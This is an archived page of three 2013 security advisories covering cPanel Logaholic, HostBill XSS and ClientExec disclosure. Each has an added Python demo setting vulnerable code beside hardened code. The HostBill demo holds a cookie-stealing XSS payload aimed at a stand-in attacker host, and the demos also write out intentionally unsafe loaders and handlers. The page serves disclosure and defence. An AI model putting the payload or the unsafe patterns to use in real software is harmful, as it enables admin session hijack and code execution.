Archive for December, 2013

cPanel – Arbitrary File Creation (Logaholic) (R911-0100)

Wednesday, December 18th, 2013

Type: Arbitrary File Creation
Location: Remote
Impact: High
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: All versions prior to the fixed builds below.
Fixed Version: 11.40.1.3, 11.40.0.29, 11.38.2.13 & 11.36.2.10
CVE: -
R911: 0100
Date: 2013-12-18
By: Rack911

Product Description:

cPanel is an easy-to-use control panel that gives web hosts, and the website owners they serve, the ability to quickly and easily manage their servers and websites. Web Host Manager (WHM) is a part of the cPanel software, often used by resellers and system administrators.

Vulnerability Description:

Logaholic session files were stored in the world-writable /tmp directory. A local attacker with access to the cPanel Logaholic interfaces could create a session file in this directory containing a crafted payload, which would execute arbitrary code as the cpanel-logaholic user when the session was loaded by the Logaholic interfaces inside cPanel.
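The bug class above in working form, as an added example written for this page rather than cPanel's or Logaholic's code: an unsafe loader that trusts any file sitting in a shared directory, beside a hardened loader that refuses files whose directory is writable by others, that are not owned by the expected uid, or that are symlinks, and that inspects the opened descriptor rather than the path. The file names, the JSON session format and the two-role demo (the same uid plays attacker and victim) are assumptions of the example.

```python
"""
Added example (not cPanel's or Logaholic's code): why a privileged process
must not load per-user session files out of a shared, world-writable
directory such as /tmp, and the checks a hardened loader applies. The file
names, JSON format and the two-role demo below are constructed for this page.
"""
import json
import os
import stat
import tempfile


class UnsafeSessionPath(Exception):
    """The session file, or the directory holding it, fails a safety check."""


def load_session_unsafe(path):
    # Vulnerable pattern: whatever sits at `path` is trusted and loaded. With
    # a shared directory, any local user can pre-create (plant) that file.
    with open(path) as fh:
        return json.load(fh)


def load_session_safe(path, expected_uid):
    """Load a session file only if no other local user could have planted it."""
    directory = os.path.dirname(os.path.abspath(path))
    dir_st = os.stat(directory)
    # Root cause on the page: the directory is shared. Require one owned by
    # the expected uid and not writable by group or others.
    if dir_st.st_uid != expected_uid:
        raise UnsafeSessionPath("session directory not owned by expected uid")
    if dir_st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise UnsafeSessionPath("session directory is group/world-writable")
    # Open without following symlinks, then inspect the opened descriptor
    # rather than the path so a swap between check and use cannot bypass us.
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as exc:
        raise UnsafeSessionPath("cannot open session file: %s" % exc) from exc
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise UnsafeSessionPath("session file is not a regular file")
        if st.st_uid != expected_uid:
            raise UnsafeSessionPath("session file not owned by expected uid")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise UnsafeSessionPath("session file is group/world-writable")
        fh = os.fdopen(fd, "r")
    except Exception:
        os.close(fd)
        raise
    with fh:
        return json.load(fh)


def demo():
    """Constructed two-role scenario; the same uid plays attacker and victim,
    which is enough to exercise the directory check. Returns the outcomes."""
    me = os.getuid()
    results = {}
    with tempfile.TemporaryDirectory() as shared, \
            tempfile.TemporaryDirectory() as private:
        # Shared directory with the same mode as /tmp: sticky, world-writable.
        os.chmod(shared, 0o1777)
        planted = os.path.join(shared, "sess_victim")
        with open(planted, "w") as fh:              # "attacker" plants the file
            json.dump({"user": "victim", "payload": "attacker-controlled"}, fh)
        results["unsafe_shared"] = load_session_unsafe(planted)["payload"]
        try:
            load_session_safe(planted, me)
            results["safe_shared"] = "accepted"
        except UnsafeSessionPath as exc:
            results["safe_shared"] = str(exc)

        # Fix: a private directory (TemporaryDirectory creates it mode 0700)
        # and a session file created with O_EXCL so a pre-existing one is
        # never silently reused.
        own = os.path.join(private, "sess_victim")
        fd = os.open(own, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd, "w") as fh:
            json.dump({"user": "victim"}, fh)
        results["safe_private"] = load_session_safe(own, me)["user"]
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-14s %s" % (key, value))
```

The directory check is the one that matters for the advisory: once session files live under a per-user directory with mode 0700, the ownership and symlink checks only guard against misconfiguration, and the sticky bit on /tmp does nothing to help, since it only stops other users deleting or renaming a file, not pre-creating one the victim will later read.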

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that arbitrary files can be created, and arbitrary code executed, as the cpanel-logaholic user.

Vulnerable Version:

This vulnerability was tested against cPanel 11.40.0.9 and is believed to exist in all versions prior to the fixed builds below.

Fixed Version:

This vulnerability was patched in cPanel 11.40.1.3, 11.40.0.29, 11.38.2.13 & 11.36.2.10.

Vendor Contact Timeline:

2013-11-07: Vendor contacted via email.
2013-11-10: Vendor confirms vulnerability.
2013-12-16: Vendor issues updates to all builds.
2013-12-18: Rack911 issues security advisory.

HostBill – XSS Admin Hijack Security Vulnerability (R911-0099)

Saturday, December 14th, 2013

Type: XSS
Location: Remote
Impact: High
Product: HostBill
Website: http://www.hostbillapp.com
Vulnerable Version: 2013-12-11
Fixed Version: 2013-12-14
CVE: -
R911: 0099
Date: 2013-12-14
By: Rack911

Product Description:

Whether you resell hosting or lease colocation space, you need to bill your customers. The HostBill platform's core components are designed to help you acquire customers, automate your services and ensure that invoices are paid on time.

Vulnerability Description:

There is an XSS vulnerability present within HostBill that would allow a malicious user to obtain the admin session cookie, which could then be used to hijack access to the panel.
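An added example, written for this page and not HostBill's code, of the two controls that decide whether an XSS like this becomes an admin hijack: output encoding, which stops the injected script from running at all, and the HttpOnly (with Secure and SameSite) cookie flags, which keep document.cookie from handing the session id to any script that does run. The page fragment, the cookie name `admin_sid` and the exfiltration payload are assumptions of the example.

```python
"""
Added example (not HostBill's code): output encoding beside the raw
concatenation that makes XSS possible, and an admin session cookie with and
without the flags that keep injected script from reading it. Field names,
cookie name and the payload are constructed for this page.
"""
import html
from http.cookies import SimpleCookie

# Constructed attacker input: the classic document.cookie exfiltration payload.
PAYLOAD = ('<script>new Image().src="http://attacker.invalid/?c="'
           '+document.cookie</script>')


def render_unsafe(note):
    """Vulnerable: user-controlled text is concatenated straight into HTML."""
    return "<div class=note>" + note + "</div>"


def render_safe(note):
    """Hardened: HTML-encode every user-controlled value at output time."""
    return "<div class=note>" + html.escape(note, quote=True) + "</div>"


def contains_active_markup(page):
    """Crude probe used only to show whether the payload survived encoding."""
    return "<script" in page.lower()


def admin_session_cookie(session_id, hardened=True):
    """Set-Cookie header for the admin session, with or without the flags."""
    c = SimpleCookie()
    c["admin_sid"] = session_id
    c["admin_sid"]["path"] = "/admin/"
    if hardened:
        c["admin_sid"]["httponly"] = True   # invisible to document.cookie
        c["admin_sid"]["secure"] = True     # never sent over plain HTTP
        c["admin_sid"]["samesite"] = "Lax"  # not attached to cross-site navigations
    return c.output(header="Set-Cookie:").strip()


def cookie_readable_by_script(set_cookie_header):
    """Model of the browser rule: HttpOnly cookies are hidden from page script."""
    return "httponly" not in set_cookie_header.lower()


def demo():
    """Returns whether the payload runs and whether the cookie is stealable."""
    weak = admin_session_cookie("s3cr3t", hardened=False)
    strong = admin_session_cookie("s3cr3t", hardened=True)
    return {
        "payload_runs_in_unsafe_page": contains_active_markup(render_unsafe(PAYLOAD)),
        "payload_runs_in_safe_page": contains_active_markup(render_safe(PAYLOAD)),
        "weak_cookie_stealable": cookie_readable_by_script(weak),
        "hardened_cookie_stealable": cookie_readable_by_script(strong),
    }


if __name__ == "__main__":
    print(admin_session_cookie("s3cr3t"))
    for key, value in demo().items():
        print("%-28s %s" % (key, value))
```

HttpOnly is defence in depth, not a fix for the XSS itself: script that runs in the admin's page can still issue requests with the admin's cookie attached (adding users, changing settings) even when it cannot read the cookie value. The encoding fix is the one that closes the report; the cookie flags limit what a future bypass is worth.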

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that the admin account(s) can be hijacked.

Vulnerable Version:

This vulnerability was tested against HostBill v2013-12-11.

Fixed Version:

This vulnerability was patched in HostBill v2013-12-14.

Vendor Contact Timeline:

2013-12-13: Vendor contacted via email.
2013-12-14: Vendor confirms vulnerability.
2013-12-14: Vendor issues v2013-12-14 update.
2013-12-14: Rack911 issues security advisory.

ClientExec – Content Disclosure Vulnerability (R911-0098)

Friday, December 6th, 2013

Type: Content Disclosure
Location: Remote
Impact: Medium
Product: ClientExec
Website: http://www.clientexec.com
Vulnerable Version: 4.6.8
Fixed Version: 4.6.9
CVE: -
R911: 0098
Date: 2013-12-05
By: Rack911

Product Description:

ClientExec is a comprehensive and flexible web hosting billing solution that will help you manage and expand your existing base of hosting clients. ClientExec was conceived and built with small to mid-sized hosting companies in mind. ClientExec was built to enable business owners to effectively manage their hosting clients and web hosting billing using one convenient and powerful platform.

Vulnerability Description:

By carefully crafting the request sent when submitting a ticket, a malicious user can obtain the product details (name / domain) belonging to any other user.
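An added example, written for this page and not ClientExec's code, of the authorization gap behind a disclosure of this kind: a ticket handler that looks up whatever product id the request carries, beside one that resolves the id only within the authenticated user's own products and fails closed. The product table, field names and request shape are constructed for the example.

```python
"""
Added example (not ClientExec's code): a ticket form that echoes product
details looked up by a client-supplied id, beside the ownership-scoped
lookup that stops one customer reading another customer's product. The
table, field names and request shape are constructed for this page.
"""

# Constructed product table: which product belongs to which customer.
PRODUCTS = {
    101: {"owner": "alice", "name": "Shared Hosting", "domain": "alice.example"},
    202: {"owner": "bob",   "name": "VPS",            "domain": "bob.example"},
}


class NotAuthorized(Exception):
    """Raised when the requested product is not accessible to the caller."""


def product_for_ticket_unsafe(current_user, request):
    """Vulnerable: trusts the product id in the request. Any customer can
    put any id in the ticket form and the page echoes that product's
    name and domain; `current_user` is never consulted."""
    product = PRODUCTS.get(int(request["product_id"]))
    if product is None:
        raise KeyError("unknown product")
    return {"name": product["name"], "domain": product["domain"]}


def product_for_ticket_safe(current_user, request):
    """Hardened: resolve the id only among products the current user owns,
    and fail closed for everything else, including malformed ids."""
    try:
        pid = int(request["product_id"])
    except (KeyError, ValueError, TypeError):
        raise NotAuthorized("product not accessible")
    product = PRODUCTS.get(pid)
    if product is None or product["owner"] != current_user:
        # One error for "does not exist" and "not yours", so the form cannot
        # be used to enumerate which ids are live.
        raise NotAuthorized("product not accessible")
    return {"name": product["name"], "domain": product["domain"]}


def demo():
    """Alice submits a ticket twice: once with her own product id, once with
    Bob's. Returns what each handler disclosed."""
    crafted = {"subject": "help", "product_id": "202"}   # Bob's product
    legit = {"subject": "help", "product_id": "101"}     # Alice's product
    out = {"unsafe_leak": product_for_ticket_unsafe("alice", crafted)["domain"]}
    try:
        product_for_ticket_safe("alice", crafted)
        out["safe_crafted"] = "leaked"
    except NotAuthorized:
        out["safe_crafted"] = "denied"
    out["safe_legit"] = product_for_ticket_safe("alice", legit)["domain"]
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-13s %s" % (key, value))
```

The same scoping has to be applied wherever the id is later used (ticket listing, ticket reply, staff view), not only at submission: a product id that was validated on one page but stored unchecked from another still leaks.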

Impact:

We have deemed this vulnerability to be rated as MEDIUM due to the fact that other users' information can be obtained.

Vulnerable Version:

This vulnerability was tested against ClientExec v4.6.8.

Fixed Version:

This vulnerability was patched in ClientExec v4.6.9. We thank ClientExec for their commitment to security by providing prompt updates!

Vendor Contact Timeline:

2013-12-05: Vendor contacted via email.
2013-12-05: Vendor confirms vulnerability.
2013-12-06: Vendor issues update.
2013-12-06: Rack911 issues security advisory.